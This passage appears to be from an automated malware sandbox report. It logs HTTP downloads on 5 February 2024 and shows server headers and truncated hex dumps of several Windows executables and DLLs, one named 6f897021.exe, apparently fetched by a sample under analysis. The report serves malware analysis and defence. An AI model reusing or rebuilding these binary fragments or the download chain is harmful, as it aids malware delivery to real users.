00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 64 93 00 00 00 10 00 00 Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*F@@@@P,CODEd
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 05 Feb 2024 11:12:31 GMTContent-Type: application/octet-streamContent-Length: 9104384Last-Modified: Fri, 02 Feb 2024 16:13:27 GMTConnection: keep-aliveETag: "65bd14a7-8aec00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a7 14 bd 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 e2 8a 00 00 08 00 00 00 00 00 00 ae 00 8b 00 00 20 00 00 00 20 8b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 8b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 60 00 8b 00 4b 00 00 00 00 20 8b 00 40 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 8b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b4 e0 8a 00 00 20 00 00 00 e2 8a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 40 05 00 00 00 20 8b 00 00 06 00 00 00 e4 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 8b 00 00 02 00 00 00 ea 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 8b 00 00 00 00 00 48 00 00 00 02 00 05 00 90 ea 8a 00 d0 15 00 00 03 00 00 00 01 00 00 06 d8 27 00 00 b8 c2 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 5f 01 00 00 01 00 00 11 7e 03 00 00 04 2c 0d 28 11 00 00 06 2c 06 16 28 0d 00 00 0a 7e 04 00 00 04 2c 0d 28 13 00 00 06 2c 06 16 28 0d 00 00 0a 7e 05 00 00 04 2c 0d 28 15 00 00 06 2c 06 16 28 0d 00 00 0a 7e 06 00 00 04 2c 0d 28 16 00 00 06 2c 06 16 28 0d 00 00 0a 7e 01 00 00 04 2c 10 7e 02 00 00 04 20 e8 03 00 00 5a 28 0e 00 00 0a 7e 07 00 00 04 2c 11 72 01 00 00 70 72 01 00 00 70 16 28 09 00 00 06 26 16 0a 38 c2 00 00 00 7e 0c 00 00 04 06 6f 0f 00 00 0a 0b 7e 0d 00 00 04 06 6f 0f 00 00 0a 0c 7e 0e 00 00 04 06 6f 0f 00 00 0a 0d 7e 0f 00 00 04 06 6f 0f 00 00 0a 13 04 07 28 08 00 00 06 13 05 7e 0a 00 00 04 2c 09 11 05 28 02 00 00 06 13 05 7e 09 00 00 04 72 03 00 00 70 28 10 00 00 0a 2c 1a 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 11 05 28 04 00 00 06 13 05 2b 29 7e 09 00 00 04 72 31 00 00 70 28 10 00 00 0a 2c 18 11 05 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 28 03 00 00 06 13 05 11 04 07 08 28 13 00 00 0a 28 14 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.24.0Date: Mon, 05 Feb 2024 11:12:41 GMTContent-Type: application/octet-streamConnection: closeContent-Description: File TransferContent-Disposition: attachment; filename=6f897021.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d4 fb 96 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 7c 02 00 00 48 03 00 00 00 00 00 7f 24 00 00 00 10 00 00 00 90 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 05 00 00 04 00 00 6b 7c 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc e2 02 00 64 00 00 00 00 20 04 00 78 a4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 91 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 db 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 02 00 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 16 7a 02 00 00 10 00 00 00 7c 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 5c 00 00 00 90 02 00 00 5e 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 64 25 01 00 00 f0 02 00 00 52 00 00 00 de 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 a4 01 00 00 20 04 00 00 a6 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 05 Feb 2024 11:12:44 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Feb 2024 11:00:02 GMTETag: "50000-610a05d0c651d"Accept-Ranges: bytesContent-Length: 327680Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 a7 57 0d 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 a6 02 00 00 48 03 00 00 00 00 00 7f 24 00 00 00 10 00 00 00 c0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 70 24 00 00 04 00 00 e1 e1 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc 12 03 00 64 00 00 00 00 50 04 00 78 a4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 c1 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 02 00 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 06 a4 02 00 00 10 00 00 00 a6 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 5c 00 00 00 c0 02 00 00 5e 00 00 00 aa 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 64 25 01 00 00 20 03 00 00 52 00 00 00 08 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 14 20 00 00 50 04 00 00 a6 01 00 00 5a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 05 Feb 2024 11:12:50 GMTContent-Type: application/x-msdos-programContent-Length: 1106998Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 05 Feb 2024 11:12:56 GMTContent-Type: application/x-msdos-programContent-Length: 685392Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 05 Feb 2024 11:12:57 GMTContent-Type: application/x-msdos-programContent-Length: 608080Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 05 Feb 2024 11:12:58 GMTContent-Type: application/x-msdos-programContent-Length: 450024Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
